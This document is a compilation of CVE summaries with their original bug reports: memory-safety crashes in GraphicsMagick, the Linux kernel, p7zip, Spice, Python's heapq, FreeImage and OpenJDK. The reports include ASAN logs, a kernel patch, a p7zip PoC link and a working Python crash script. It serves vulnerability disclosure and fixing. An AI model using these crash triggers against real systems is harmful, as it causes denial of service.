Buffer Overflow vulnerability in WritePCXImage function in pcx.c in GraphicsMagick 1.4 allows remote attackers to cause a denial of service via converting of crafted image file to pcx format.

Hi, I found a heap-buffer-overflow in WritePCXImage at pcx.c:1255  
I tested it in GraphicsMagick 1.4  
how to reproduce :

ASAN LOG

\==14178\==ERROR: AddressSanitizer: heap\-buffer\-overflow on address 0x6030000000c0 at pc 0x0000028f29c0 bp 0x7ffec5056070 sp 0x7ffec5056068
WRITE of size 1 at 0x6030000000c0 thread T0
    #0 0x28f29bf in WritePCXImage /home/suhwan/project/graphicsmagick\-code/coders/pcx.c:1255:17
    #1 0x8e5c7e in WriteImage /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2245:14
    #2 0x8eac18 in WriteImages /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2404:21
    #3 0x615be6 in ConvertImageCommand /home/suhwan/project/graphicsmagick\-code/magick/command.c:6135:11
    #4 0x72e875 in MagickCommand /home/suhwan/project/graphicsmagick\-code/magick/command.c:8880:17
    #5 0x810c5c in GMCommandSingle /home/suhwan/project/graphicsmagick\-code/magick/command.c:17412:10
    #6 0x80ba1e in GMCommand /home/suhwan/project/graphicsmagick\-code/magick/command.c:17465:16
    #7 0x7ff6e5aa2b96 in \_\_libc\_start\_main (/lib/x86\_64\-linux\-gnu/libc.so.6+0x21b96)
    #8 0x424239 in \_start (/home/suhwan/project/fuzz\-input\-validate/test/bin/gm+0x424239)

0x6030000000c0 is located 0 bytes to the right of 32\-byte region \[0x6030000000a0,0x6030000000c0)
allocated by thread T0 here:
    #0 0x4cc083 in \_\_interceptor\_malloc /tmp/final/llvm.src/projects/compiler\-rt/lib/asan/asan\_malloc\_linux.cc:146:3
    #1 0x28ddf2c in WritePCXImage /home/suhwan/project/graphicsmagick\-code/coders/pcx.c:1172:16
    #2 0x8e5c7e in WriteImage /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2245:14
    #3 0x8eac18 in WriteImages /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2404:21

SUMMARY: AddressSanitizer: heap\-buffer\-overflow /home/suhwan/project/graphicsmagick\-code/coders/pcx.c:1255:17 in WritePCXImage
Shadow bytes around the buggy address:
  0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff8000: fa fa fd fd fd fd fa fa 00 00 00 fa fa fa 00 00
\=>0x0c067fff8010: 05 fa fa fa 00 00 00 00\[fa\]fa fa fa fa fa fa fa
  0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
\==14178\==ABORTING

GraphicsMagick 1.4 snapshot-20191225 Q8 http://www.GraphicsMagick.org/  
Copyright (C) 2002-2019 GraphicsMagick Group.  
Additional copyrights and licenses apply to this software.  
See http://www.GraphicsMagick.org/www/Copyright.html for details.

Feature Support:  
Native Thread Safe yes  
Large Files (> 32 bit) yes  
Large Memory (> 32 bit) yes  
BZIP yes  
DPS no  
FlashPix no  
FreeType yes  
Ghostscript (Library) no  
JBIG yes  
JPEG-2000 no  
JPEG yes  
Little CMS yes  
Loadable Modules no  
Solaris mtmalloc no  
OpenMP yes (201107 "3.1")  
PNG yes  
TIFF yes  
TRIO no  
Solaris umem no  
WebP no  
WMF no  
X11 yes  
XML yes  
ZLIB yes

Host type: x86\_64-pc-linux-gnu

CVE-2020-21679: GraphicsMagick / Bugs / #619 heap-buffer-overflow in WritePCXImage

A Use After Free vulnerability in Fedora Linux kernel 5.9.0-rc9 allows attackers to obatin sensitive information via vgacon_invert_region() function.

Submitted by Zhang Xiaoxu on March 4, 2020, 2:24 a.m.

**Details**

**Not browsing as part of any series.**

**Commit Message****Patch hide | download patch | download mbox**

diff --git a/drivers/video/console/vgacon.c b/drivers/video/console/vgacon.c
index de7b8382aba9..998b0de1812f 100644
\--- a/drivers/video/console/vgacon.c
+++ b/drivers/video/console/vgacon.c
@@ -1316,6 +1316,9 @@  static int vgacon\_font\_get(struct vc\_data \*c, struct console\_font \*font)
 static int vgacon\_resize(struct vc\_data \*c, unsigned int width,
 			 unsigned int height, unsigned int user)
 {
+	if ((width << 1) \* height > vga\_vram\_size)
+		return -EINVAL;
+
 	if (width % 2 || width > screen\_info.orig\_video\_cols ||
 	    height > (screen\_info.orig\_video\_lines \* vga\_default\_font\_height)/
 	    c->vc\_font.height)

**Comments**

CVE-2020-27418: [v4] vgacon: Fix a UAF in vgacon_invert_region

p7zip 16.02 was discovered to contain a heap-buffer-overflow vulnerability via the function NArchive::NZip::CInArchive::FindCd(bool) at CPP/7zip/Archive/Zip/ZipIn.cpp.

*   Summary
*   Files
*   Reviews
*   Support
*   Tickets ▾
    *   Bugs
    *   Support Requests
    *   Patches
    *   Feature Requests
*   Discussion

Menu ▾ ▴

Status: open

Owner: nobody

Labels: None

Priority: 5

Updated: 2022-12-09

Created: 2022-12-09

Private: No

**Description**

Heap-buffer-overflow in CPP/7zip/Archive/Zip/ZipIn.cpp:1116 in NArchive::NZip::CInArchive::FindCd(bool)

**Verison**

$ ./7za   
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,64 CPUs x64)

**Replay**

./7za t poc.zip

**POC**

https://github.com/17ssDP/fuzzer\_crashes/raw/main/zip/poc.zip

**ASAN**

$./7zatpoc.zip

7-Zip(a)[64]16.02:Copyright(c)1999-2016IgorPavlov:2016-05-21
p7zipVersion16.02(locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64bits,64CPUsx64)

Scanningthedriveforarchives:
1file,4340bytes(5KiB)

Testingarchive:poc.zip
=================================================================
==65213==ERROR:AddressSanitizer:heap-buffer-overflowonaddress0x6210000000ffatpc0x55b8f9dd0731bp0x7ffd13599890sp0x7ffd13599880
READofsize4at0x6210000000ffthreadT0
#00x55b8f9dd0730inNArchive::NZip::CInArchive::FindCd(bool)../../../../CPP/7zip/Archive/Zip/ZipIn.cpp:1116
#10x55b8f9dd5f00inNArchive::NZip::CInArchive::ReadVols()../../../../CPP/7zip/Archive/Zip/ZipIn.cpp:1578
#20x55b8f9e01d9binNArchive::NZip::CInArchive::Open(IInStream*,unsignedlonglongconst*,IArchiveOpenCallback*,CObjectVector<NArchive::NZip::CItemEx>&)../../../../CPP/7zip/Archive/Zip/ZipIn.cpp:2135
#30x55b8f9d4c294inNArchive::NZip::CHandler::Open(IInStream*,unsignedlonglongconst*,IArchiveOpenCallback*)../../../../CPP/7zip/Archive/Zip/ZipHandler.cpp:474
#40x55b8fa46890binCArc::OpenStream2(COpenOptionsconst&)../../../../CPP/7zip/UI/Common/OpenArchive.cpp:1878
#50x55b8fa47fb6ainCArc::OpenStream(COpenOptionsconst&)../../../../CPP/7zip/UI/Common/OpenArchive.cpp:2901
#60x55b8fa481451inCArc::OpenStreamOrFile(COpenOptions&)../../../../CPP/7zip/UI/Common/OpenArchive.cpp:2993
#70x55b8fa48437ainCArchiveLink::Open(COpenOptions&)../../../../CPP/7zip/UI/Common/OpenArchive.cpp:3169
#80x55b8fa48ccf5inCArchiveLink::Open2(COpenOptions&,IOpenCallbackUI*)../../../../CPP/7zip/UI/Common/OpenArchive.cpp:3292
#90x55b8fa48f2a5inCArchiveLink::Open3(COpenOptions&,IOpenCallbackUI*)../../../../CPP/7zip/UI/Common/OpenArchive.cpp:3356
#100x55b8fa409e7einExtract(CCodecs*,CObjectVector<COpenType>const&,CRecordVector<int>const&,CObjectVector<UString>&,CObjectVector<UString>&,NWildcard::CCensorNodeconst&,CExtractOptionsconst&,IOpenCallbackUI*,IExtractCallbackUI*,IHashCalc*,UString&,CDecompressStat&)../../../../CPP/7zip/UI/Common/Extract.cpp:362
#110x55b8fa5cc0b6inMain2(int,char**)../../../../CPP/7zip/UI/Console/Main.cpp:923
#120x55b8f9819ef8inmain../../../../CPP/7zip/UI/Console/MainAr.cpp:66
#130x7fa675178c86in__libc_start_main(/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
#140x55b8f981c069in_start(/home/p7zip/7za+0x41069)

0x6210000000ffislocated1bytestotheleftof4340-byteregion[0x621000000100,0x6210000011f4)
allocated by thread T0 here:
    #0 0x7fa675e6c608 in operator new[](unsignedlong)(/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608)
#10x55b8f9dce590inCObjArray<unsignedchar>::CObjArray(unsignedlong)../../../../CPP/7zip/Archive/Zip/../../../Common/MyBuffer.h:141
#20x55b8f9dce590inNArchive::NZip::CInArchive::FindCd(bool)../../../../CPP/7zip/Archive/Zip/ZipIn.cpp:1066

SUMMARY:AddressSanitizer:heap-buffer-overflow../../../../CPP/7zip/Archive/Zip/ZipIn.cpp:1116inNArchive::NZip::CInArchive::FindCd(bool)
Shadowbytesaroundthebuggyaddress:
0x0c427fff7fc0:00000000000000000000000000000000
0x0c427fff7fd0:00000000000000000000000000000000
0x0c427fff7fe0:00000000000000000000000000000000
0x0c427fff7ff0:00000000000000000000000000000000
0x0c427fff8000:fafafafafafafafafafafafafafafafa
=>0x0c427fff8010:fafafafafafafafafafafafafafafa[fa]
0x0c427fff8020:00000000000000000000000000000000
0x0c427fff8030:00000000000000000000000000000000
0x0c427fff8040:00000000000000000000000000000000
0x0c427fff8050:00000000000000000000000000000000
0x0c427fff8060:00000000000000000000000000000000
Shadowbytelegend(oneshadowbyterepresents8applicationbytes):
Addressable:00
Partiallyaddressable:01020304050607
Heapleftredzone:fa
Freedheapregion:fd
Stackleftredzone:f1
Stackmidredzone:f2
Stackrightredzone:f3
Stackafterreturn:f5
Stackuseafterscope:f8
Globalredzone:f9
Globalinitorder:f6
Poisonedbyuser:f7
Containeroverflow:fc
Arraycookie:ac
Intraobjectredzone:bb
ASaninternal:fe
Leftallocaredzone:ca
Rightallocaredzone:cb
==65213==ABORTING

**Environment**

**1 Attachments**

**Discussion**

Log in to post a comment.

CVE-2022-47069: p7zip / Bugs / #241 Heap-buffer-overflow in ZipIn.cpp:1116

An issue was discovered in spice-server spice-server-0.14.0-6.el7_6.1.x86_64 of Redhat's VDI product. There is a security vulnerablility that can restart KVMvirtual machine without any authorization. It is not yet known if there will be other other effects.

**Spice-Security-Issues**

I found a security issue on spice Server when I was fuzzing Spice server.

**Introduce**

A handshake is required before the spice-server and spice-client can establish communication, spice-client will send a request containing some information that the server needs. This TCP request requires only host and port. So I constructed a malformed TCP packet that caused the vm to crash and the QEMu-KVM process to be restarted.

**How to run**

#1. Send a malformed TCP packet(Observe the packets intercepted by Wirshark)  #2. check qemu-kvm process && kvm instance state

Before sending a malformed TCP packet  
  After sending a malformed TCP packet  

#3. Check libvirt's log that the virtual machine crashed  #4. Observe the virtual machine through virt-manage, found that the virtual machine has been restarted 

**Vulnerability Code**

Code Address: https://gitlab.freedesktop.org/spice/spice/-/blob/master/server/red-stream.cpp  
Function：async\_read\_handler Description: The function async\_READ\_handler caused a deadlock while processing the data stream. 

**Related component version**

Centos: Linux version 3.10.0-957.10.2.el7.x86\_64  
Qemu-kvm: QEMU emulator version 2.10.0(qemu-kvm-ev-2.10.0-21.el7\_5.7.1)  
Spice-server rpm: spice-server-0.14.0-6.el7\_6.1.x86\_64

CVE-2020-23793: GitHub - zelat/spice-security-issues

A use-after-free exists in Python through 3.9 via heappushpop in heapq.

Issue39421

Created on **2020-01-22 15:11** by **dk0n9**, last changed **2022-04-11 14:59** by **admin**. This issue is now **closed**.

Pull Requests

URL

Status

Linked

Edit

PR 18118

merged

pablogsal, 2020-01-22 15:54

PR 18144

closed

miss-islington, 2020-01-23 14:07

PR 18145

merged

miss-islington, 2020-01-23 14:07

PR 18146

merged

miss-islington, 2020-01-23 14:07

PR 18149

merged

miss-islington, 2020-01-23 15:05

Messages (10)

msg360474 - (view)

Author: Dk0n9 (dk0n9)

Date: 2020-01-22 15:13

The variable \`heap\` in heappushpop does not add a reference count

\`\`\`c
    cmp = PyObject\_RichCompareBool(PyList\_GET\_ITEM(heap, 0), item, Py\_LT);
    if (cmp < 0)
        return NULL;
    if (cmp == 0) {
        Py\_INCREF(item);
        return item;
    }
\`\`\`

POC：
\`\`\`python
import heapq

class h(int):
    def \_\_lt\_\_(self, o):
        list1.clear()
        return NotImplemented

list1 = \[\]

heapq.heappush(list1, h(0))
heapq.heappushpop(list1, 1)
\`\`\`


Crash detail with asan:

==62141==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000fd778 at pc 0x00000049cdce bp 0x7ffe9690f650 sp 0x7ffe9690f640
READ of size 8 at 0x6060000fd778 thread T0
    #0 0x49cdcd in long\_richcompare Objects/longobject.c:3047
    #1 0x4f9495 in do\_richcompare Objects/object.c:802
    #2 0x4f9495 in PyObject\_RichCompare Objects/object.c:846
    #3 0x4f9495 in PyObject\_RichCompareBool Objects/object.c:868
    #4 0x7ff74c523594 in \_heapq\_heappushpop\_impl /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/\_heapqmodule.c:267
    #5 0x7ff74c523594 in \_heapq\_heappushpop /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/clinic/\_heapqmodule.c.h:109
    #6 0x854c30 in cfunction\_vectorcall\_FASTCALL Objects/methodobject.c:366
    #7 0x443885 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:111
    #8 0x443885 in \_PyObject\_Vectorcall Include/cpython/abstract.h:120
    #9 0x443885 in call\_function Python/ceval.c:4850
    #10 0x443885 in \_PyEval\_EvalFrameDefault Python/ceval.c:3306
    #11 0x5e1d76 in \_PyEval\_EvalFrame Include/internal/pycore\_ceval.h:43
    #12 0x5e1d76 in \_PyEval\_EvalCode Python/ceval.c:4142
    #13 0x5e2207 in \_PyEval\_EvalCodeWithName Python/ceval.c:4174
    #14 0x5e2207 in PyEval\_EvalCodeEx Python/ceval.c:4190
    #15 0x5e2207 in PyEval\_EvalCode Python/ceval.c:717
    #16 0x6862fc in run\_eval\_code\_obj Python/pythonrun.c:1125
    #17 0x6862fc in run\_mod Python/pythonrun.c:1147
    #18 0x6862fc in PyRun\_FileExFlags Python/pythonrun.c:1063
    #19 0x6867b2 in PyRun\_SimpleFileExFlags Python/pythonrun.c:428
    #20 0x446495 in pymain\_run\_file Modules/main.c:369
    #21 0x446495 in pymain\_run\_python Modules/main.c:553
    #22 0x446495 in Py\_RunMain Modules/main.c:632
    #23 0x446f86 in pymain\_main Modules/main.c:662
    #24 0x446f86 in Py\_BytesMain Modules/main.c:686
    #25 0x7ff74f34882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #26 0x444478 in \_start (/home/\*\*\*/Python-3.9.0a2/python+0x444478)

0x6060000fd778 is located 24 bytes inside of 56-byte region \[0x6060000fd760,0x6060000fd798)
freed by thread T0 here:
    #0 0x7ff7500b72ca in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x52a5d9 in subtype\_dealloc Objects/typeobject.c:1291
    #2 0x4222a6 in \_Py\_DECREF Include/object.h:478
    #3 0x4222a6 in frame\_dealloc Objects/frameobject.c:636
    #4 0x422088 in \_Py\_DECREF Include/object.h:478
    #5 0x422088 in function\_code\_fastcall Objects/call.c:335
    #6 0x53aac6 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:111
    #7 0x53aac6 in vectorcall\_unbound Objects/typeobject.c:1459
    #8 0x53aac6 in slot\_tp\_richcompare Objects/typeobject.c:6703
    #9 0x4f921d in do\_richcompare Objects/object.c:796
    #10 0x4f921d in PyObject\_RichCompare Objects/object.c:846
    #11 0x4f921d in PyObject\_RichCompareBool Objects/object.c:868
    #12 0x7ff74c523594 in \_heapq\_heappushpop\_impl /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/\_heapqmodule.c:267
    #13 0x7ff74c523594 in \_heapq\_heappushpop /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/clinic/\_heapqmodule.c.h:109
    #14 0x854c30 in cfunction\_vectorcall\_FASTCALL Objects/methodobject.c:366
    #15 0x443885 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:111
    #16 0x443885 in \_PyObject\_Vectorcall Include/cpython/abstract.h:120
    #17 0x443885 in call\_function Python/ceval.c:4850
    #18 0x443885 in \_PyEval\_EvalFrameDefault Python/ceval.c:3306
    #19 0x5e1d76 in \_PyEval\_EvalFrame Include/internal/pycore\_ceval.h:43
    #20 0x5e1d76 in \_PyEval\_EvalCode Python/ceval.c:4142
    #21 0x5e2207 in \_PyEval\_EvalCodeWithName Python/ceval.c:4174
    #22 0x5e2207 in PyEval\_EvalCodeEx Python/ceval.c:4190
    #23 0x5e2207 in PyEval\_EvalCode Python/ceval.c:717
    #24 0x6862fc in run\_eval\_code\_obj Python/pythonrun.c:1125
    #25 0x6862fc in run\_mod Python/pythonrun.c:1147
    #26 0x6862fc in PyRun\_FileExFlags Python/pythonrun.c:1063
    #27 0x6867b2 in PyRun\_SimpleFileExFlags Python/pythonrun.c:428
    #28 0x446495 in pymain\_run\_file Modules/main.c:369
    #29 0x446495 in pymain\_run\_python Modules/main.c:553
    #30 0x446495 in Py\_RunMain Modules/main.c:632
    #31 0x446f86 in pymain\_main Modules/main.c:662
    #32 0x446f86 in Py\_BytesMain Modules/main.c:686
    #33 0x7ff74f34882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7ff7500b7602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x6dbfd5 in \_PyObject\_GC\_Alloc Modules/gcmodule.c:2146
    #2 0x6dbfd5 in \_PyObject\_GC\_Malloc Modules/gcmodule.c:2173
    #3 0x527d20 in PyType\_GenericAlloc Objects/typeobject.c:1014
    #4 0x4b890b in long\_subtype\_new Objects/longobject.c:5132
    #5 0x4b890b in long\_new\_impl Objects/longobject.c:5075
    #6 0x4b890b in long\_new Objects/clinic/longobject.c.h:36
    #7 0x52f606 in type\_call Objects/typeobject.c:973
    #8 0x462b46 in \_PyObject\_MakeTpCall Objects/call.c:189
    #9 0x436b70 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:109
    #10 0x436b70 in \_PyObject\_Vectorcall Include/cpython/abstract.h:120
    #11 0x436b70 in call\_function Python/ceval.c:4850
    #12 0x436b70 in \_PyEval\_EvalFrameDefault Python/ceval.c:3337
    #13 0x5e1d76 in \_PyEval\_EvalFrame Include/internal/pycore\_ceval.h:43
    #14 0x5e1d76 in \_PyEval\_EvalCode Python/ceval.c:4142
    #15 0x5e2207 in \_PyEval\_EvalCodeWithName Python/ceval.c:4174
    #16 0x5e2207 in PyEval\_EvalCodeEx Python/ceval.c:4190
    #17 0x5e2207 in PyEval\_EvalCode Python/ceval.c:717
    #18 0x6862fc in run\_eval\_code\_obj Python/pythonrun.c:1125
    #19 0x6862fc in run\_mod Python/pythonrun.c:1147
    #20 0x6862fc in PyRun\_FileExFlags Python/pythonrun.c:1063
    #21 0x6867b2 in PyRun\_SimpleFileExFlags Python/pythonrun.c:428
    #22 0x446495 in pymain\_run\_file Modules/main.c:369
    #23 0x446495 in pymain\_run\_python Modules/main.c:553
    #24 0x446495 in Py\_RunMain Modules/main.c:632
    #25 0x446f86 in pymain\_main Modules/main.c:662
    #26 0x446f86 in Py\_BytesMain Modules/main.c:686
    #27 0x7ff74f34882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-use-after-free Objects/longobject.c:3047 long\_richcompare
Shadow bytes around the buggy address:
  0x0c0c80017a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0c80017ae0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd\[fd\]
  0x0c0c80017af0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c80017b00: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c80017b10: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd
  0x0c0c80017b20: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c80017b30: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==62141==ABORTING

msg360475 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2020-01-22 15:31

Reproducible.

It looks similar to bpo-38588.
We will apply the same solution as we did at bpo-38588?
or do we plan to apply the solution which is suggested on msg359023?

msg360477 - (view)

Author: Pablo Galindo Salgado (pablogsal) \* 

Date: 2020-01-22 15:46

To be honest, given how many ways this bug happens I think its time to consider msg359023.

msg360478 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2020-01-22 15:49

\> To be honest, given how many ways this bug happens I think its time to consider msg359023.

+1 to me also

msg360479 - (view)

Author: Pablo Galindo Salgado (pablogsal) \* 

Date: 2020-01-22 15:55

AS this discussion will take a while and likely will have deeper consequences, in the meantime I created PR18118 to specifically fix this.

msg360484 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2020-01-22 16:13

@pablogsal

I agree with hotfix is needed and also for discussion.
I left a comment for PR 18118. Please take a look :)

msg360557 - (view)

Author: Pablo Galindo Salgado (pablogsal) \* 

Date: 2020-01-23 14:07

New changeset 79f89e6e5a659846d1068e8b1bd8e491ccdef861 by Pablo Galindo in branch 'master':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118)
https://github.com/python/cpython/commit/79f89e6e5a659846d1068e8b1bd8e491ccdef861

msg360558 - (view)

Author: miss-islington (miss-islington)

Date: 2020-01-23 14:25

New changeset 958064f8d2b84062b0582bbae911df8ccfc11fd6 by Miss Islington (bot) in branch '3.7':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118)
https://github.com/python/cpython/commit/958064f8d2b84062b0582bbae911df8ccfc11fd6

msg360561 - (view)

Author: Ned Deily (ned.deily) \* 

Date: 2020-01-23 14:49

New changeset c563f409ea30bcb0623d785428c9257917371b76 by Ned Deily (Miss Islington (bot)) in branch '3.6':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118) (GH-18146)
https://github.com/python/cpython/commit/c563f409ea30bcb0623d785428c9257917371b76

msg360564 - (view)

Author: miss-islington (miss-islington)

Date: 2020-01-23 15:22

New changeset 993811ffe75c2573f97fb3fd1414b34609b8c8db by Miss Islington (bot) in branch '3.8':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118)
https://github.com/python/cpython/commit/993811ffe75c2573f97fb3fd1414b34609b8c8db

History

Date

User

Action

Args

2022-04-11 14:59:25

admin

set

github: 83602

2020-01-23 15:23:27

pablogsal

set

status: open -> closed  
resolution: fixed  
stage: patch review -> resolved

2020-01-23 15:22:29

miss-islington

set

messages: + msg360564

2020-01-23 15:05:37

miss-islington

set

pull\_requests: + pull\_request17535

2020-01-23 14:49:23

ned.deily

set

nosy: + ned.deily  
messages: + msg360561  

2020-01-23 14:25:34

miss-islington

set

nosy: + miss-islington  
messages: + msg360558  

2020-01-23 14:07:43

miss-islington

set

pull\_requests: + pull\_request17532

2020-01-23 14:07:37

miss-islington

set

pull\_requests: + pull\_request17531

2020-01-23 14:07:29

miss-islington

set

stage: needs patch -> patch review  
pull\_requests: + pull\_request17530

2020-01-23 14:07:16

pablogsal

set

messages: + msg360557

2020-01-23 13:54:44

alex

set

keywords: + security\_issue  
nosy: + alex  

2020-01-22 16:13:21

corona10

set

messages: + msg360484

2020-01-22 15:55:25

pablogsal

set

messages: + msg360479  
stage: patch review -> needs patch

2020-01-22 15:54:31

pablogsal

set

keywords: + patch  
stage: needs patch -> patch review  
pull\_requests: + pull\_request17505

2020-01-22 15:49:45

corona10

set

messages: + msg360478

2020-01-22 15:46:55

pablogsal

set

messages: + msg360477

2020-01-22 15:32:01

corona10

set

nosy: + vstinner  

2020-01-22 15:31:53

corona10

set

stage: needs patch  
versions: - Python 3.6

2020-01-22 15:31:24

corona10

set

nosy: + pablogsal, corona10, methane  
messages: + msg360475  

2020-01-22 15:13:43

dk0n9

set

messages: + msg360474

2020-01-22 15:11:46

dk0n9

create

CVE-2022-48560: Issue 39421: Use-after-free in heappushpop() of heapq module

Buffer Overflow vulnerability in FreeImage_Load function in FreeImage Library 3.19.0(r1828) allows attackers to cuase a denial of service via crafted PFM file.

**SEGV in function Load() in PluginPFM.cpp****Summary:**

There is a SEGV in PluginPFM.cpp while loading image with FreeImage_Load function。

**Version Affected: 3.19.0 (r1828)****ASAN Details**

AddressSanitizer:DEADLYSIGNAL
\=================================================================
\==24231\==ERROR: AddressSanitizer: SEGV on unknown address 0x613fa5f646c0 (pc 0x0000005a86b3 bp 0x7ffee3d2c080 sp 0x7ffee3d2b8e0 T0)
\==24231\==The signal is caused by a WRITE memory access.
    #0 0x5a86b2 in Load(FreeImageIO\*, void\*, int, int, void\*) /home/src/freeimage-svn/FreeImage/trunk/Source/FreeImage/PluginPFM.cpp
    #1 0x5252fc in FreeImage\_LoadFromHandle /home/src/freeimage-svn/FreeImage/trunk/Source/FreeImage/Plugin.cpp:388:24
    #2 0x52550c in FreeImage\_Load /home/src/freeimage-svn/FreeImage/trunk/Source/FreeImage/Plugin.cpp:408:22
    #3 0x50640c in main /home/src/freeimage-svn/FreeImage/trunk/load\-test.c:16:18
    #4 0x7f6f56aa6b6a in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x26b6a)
    #5 0x428569 in \_start (/home/src/freeimage-svn/FreeImage/trunk/load\-test+0x428569)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/src/freeimage-svn/FreeImage/trunk/Source/FreeImage/PluginPFM.cpp in Load(FreeImageIO\*, void\*, int, int, void\*)
\==24231\==ABORTING

**Reproduce**

To reproduce it ,compile FreeImage with ASAN. Then compile and execute the test file in the attachment as follows:

Clang++ \-g \-fsanitize\=address load\-test.c \-lfreeimage \-L. \-lm \-o load\-test
./load\-test SEGV\_PluginPFM\_cpp

**Credit**

ADLab of Venustech

CVE-2020-22524: FreeImage / Bugs / #319 SEGV in function Load() in PluginPFM.cpp

An issue was discovered in function ciMethodBlocks::make_block_at in Oracle JDK (HotSpot VM) 11, 17 and OpenJDK (HotSpot VM) 8, 11, 17, allows attackers to cause a denial of service. Note: Vendor states that this to is Defense in Depth at most due to the nature of the issue and the special circumstances required (server must be running particular code locally, code compiled with an old, old version of javac, etc.).

ADDITIONAL SYSTEM INFORMATION :  
OS version:  
Distributor ID: Ubuntu  
Description: Ubuntu 20.04.2 LTS  
Release: 20.04  
Codename: focal

JDK version we used:

openjdk version "17.0.2" 2022-01-18  
OpenJDK Runtime Environment (build 17.0.2+8-86)  
OpenJDK 64-Bit Server VM (build 17.0.2+8-86, mixed mode, sharing)

openjdk version "18" 2022-03-22  
OpenJDK Runtime Environment (build 18+36-2087)  
OpenJDK 64-Bit Server VM (build 18+36-2087, mixed mode, sharing)

openjdk version "19-ea" 2022-09-20  
OpenJDK Runtime Environment (build 19-ea+13-808)  
OpenJDK 64-Bit Server VM (build 19-ea+13-808, mixed mode, sharing)

A DESCRIPTION OF THE PROBLEM :  
When we run the test in jdk17.0.2, jdk18 and jdk19-ea, all in compiled mode(with "-Xcomp"), it crashed with the following message. But when run the test in mixed mode or interpreted mode(with "-Xint), it passed successfully.

The error message in compiled mode:

jdk17.0.2:  
\# A fatal error has been detected by the Java Runtime Environment:  
#  
\# SIGSEGV (0xb) at pc=0x00007f0b86b5a37b, pid=32365, tid=32379  
#  
\# JRE version: OpenJDK Runtime Environment (17.0.2+8) (build 17.0.2+8-86)  
